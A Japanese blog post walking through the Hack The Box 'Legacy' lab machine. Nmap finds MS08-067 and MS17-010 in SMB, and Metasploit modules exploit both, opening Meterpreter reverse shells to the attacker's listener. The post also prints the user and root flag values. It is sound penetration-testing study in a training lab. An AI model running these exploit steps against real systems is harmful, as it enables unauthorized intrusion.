0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 3 years have passed since last update.

3台目 <Hack the Box> Legacy -Walkthrough-

Last updated at Posted at 2020-09-01

自己紹介

Hack the box ど素人
ハッキングラボを終えて試す場としておすすめだということで始めました。

自分用のメモではありますが、間違いや改善点などご指摘いただいたけたら幸いです。

マシン

今回のマシンはLegacy、
@v_avengerさんのDEF CON 28:Red Team Village:敵対者を蹴散らすゲリラレッドチームの構築を参考に進めようと思い、このマシンを選びました。

Legacy.png

nmap

まずはnmapで開いているポートを調べる。

root@kali:~# nmap -A -Pn 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 03:55 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h31m37s, deviation: 2h07m16s, median: 4d23h01m37s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:14:10 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00                                                                                                                                                                                                                     
|_  System time: 2020-09-06T23:57:46+03:00                                                                                                                                                                                                 
| smb-security-mode:                                                                                                                                                                                                                       
|   account_used: guest                                                                                                                                                                                                                    
|   authentication_level: user                                                                                                                                                                                                             
|   challenge_response: supported                                                                                                                                                                                                          
|_  message_signing: disabled (dangerous, but default)                                                                                                                                                                                     
|_smb2-time: Protocol negotiation failed (SMB2)                                                                                                                                                                                            
                                                                                                                                                                                                                                           
TRACEROUTE (using port 3389/tcp)                                                                                                                                                                                                           
HOP RTT       ADDRESS
1   250.81 ms 10.10.14.1
2   251.14 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.10 seconds

見覚えのあるポート番号の139と445が出てきた。
sambaのものでおそらくmetasploitでやるのであろうと推測を立ててみた。

脆弱性を調べてみた。

root@kali:~# nmap -Pn -script smb-vuln* -p 139 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 04:10 JST
Nmap scan report for 10.10.10.4
Host is up (0.25s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

VULNERABLEが表示され、ms08-067とms17-010という脆弱性があることがわかった。
ポート番号を変えると変化があるか興味を持ったが139と445とでは特に変化が見られなかった。

#ms08-067

root@kali:~# searchsploit ms08-067
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)                                                                                                                                    | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067)                                                                                                                                                     | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067)                                                                                                                                               | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)                                                                                                                | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067)                                                                                                                                           | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)                                                                                                                                           | windows/remote/7132.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

searchsploitでmetasploitが使えることが分かった。


msf5 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf5 > use 0
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.9:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] Meterpreter session 2 opened (10.10.14.9:4444 -> 10.10.10.4:1033) at 2020-09-02 04:42:00 +0900

うまくシェルが返ってきた。

#ms17-010
前も違うマシンでやった気がするがせっかくなのでこちらでもやってみる。


root@kali:~# searchsploit ms17-010
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                                                                                | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                                                                            | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                                         | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                     | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                               | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                                                                                            | windows_x86-64/remote/41987.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

こちらの脆弱性もmetasploitが使えるようなので使っていく。

msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

msf5 > use 4
msf5 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445                                                             yes       The Target port
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x81e5c1d0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... EoQoquDI.exe
[*] 10.10.10.4:445 - Created \EoQoquDI.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \EoQoquDI.exe...
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2020-08-03 20:44:35 +0900

こちらもうまくシェルが返ってきた。

user

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd /
meterpreter > dir
Listing: C:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
100777/rwxrwxrwx    0                  fil   2017-03-16 14:30:44 +0900        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-03-16 14:30:44 +0900        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-03-16 14:20:29 +0900        Documents and Settings
100444/r--r--r--    0                  fil   2017-03-16 14:30:44 +0900        IO.SYS
100444/r--r--r--    0                  fil   2017-03-16 14:30:44 +0900        MSDOS.SYS
100555/r-xr-xr-x    47564              fil   2008-04-14 05:13:04 +0900        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-03-16 14:20:57 +0900        Program Files
40777/rwxrwxrwx     0                  dir   2017-03-16 14:20:30 +0900        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-03-16 14:18:34 +0900        WINDOWS
100666/rw-rw-rw-    211                fil   2017-03-16 14:20:02 +0900        boot.ini
100444/r--r--r--    250048             fil   2008-04-14 07:01:44 +0900        ntldr
60401544/r-xr--r--  48691528838709231  fif   1551977431-11-16 12:18:24 +0900  pagefile.sys
meterpreter > cd Documents\ and\ Settings 
meterpreter > dir
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 15:07:20 +0900  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:52 +0900  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:42 +0900  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 14:33:41 +0900  john

meterpreter > cd john
meterpreter > dir
Listing: C:\Documents and Settings\john
=======================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-16 14:33:41 +0900  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 14:33:41 +0900  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 14:33:41 +0900  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 14:33:41 +0900  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 14:33:42 +0900  ntuser.ini

meterpreter > cd Desktop 
meterpreter > dir
Listing: C:\Documents and Settings\john\Desktop
===============================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:19:32 +0900  user.txt
meterpreter > cat user.txt
e69af0e4f443de7e36876fda4ec7644f

root

meterpreter > dir
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 15:07:20 +0900  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 14:20:29 +0900  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:52 +0900  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 14:32:42 +0900  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 14:33:41 +0900  john
meterpreter > cd Administrator 
meterpreter > dir
Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Application Data
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Cookies
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Desktop
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Favorites
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  My Documents
100666/rw-rw-rw-  786432  fil   2017-03-16 15:07:20 +0900  NTUSER.DAT
100666/rw-rw-rw-  1024    fil   2017-03-16 15:07:20 +0900  NTUSER.DAT.LOG
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  NetHood
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  PrintHood
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Recent
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  SendTo
40555/r-xr-xr-x   0       dir   2017-03-16 15:07:20 +0900  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-16 15:07:20 +0900  Templates
100666/rw-rw-rw-  178     fil   2017-03-16 15:07:21 +0900  ntuser.ini

meterpreter > cd Desktop 
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 15:18:19 +0900  root.txt

meterpreter > cat root.txt 
993442d258b0e0ec917cae9e695d5713

#疑問

・ms17-010のところでMetasploitでsearchした後どれを使えばいいかわからなくて戸惑った。
 どうやって見分けるのだろう。

Exploit DBで調べたところmetasploit 4番のものだけが書いてあった。
モジュールのタイプ

感想

今回は3個目のマシンだった。
自分で言うことじゃないがポート番号を見て察するようになったのが1つ成長と思った。

ただLameとBlueをやっていたから今回は攻略できたが、違うようなマシンだと苦しめられるのだろうなと思った。
なんとか頑張りたい。
反省点としてシェルをとった後、権限を確認しなかったこと、Exploit DBを見なかったことがよくなかったと感じた。

拙い記事を最後まで読んでいただきありがとうございました。

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?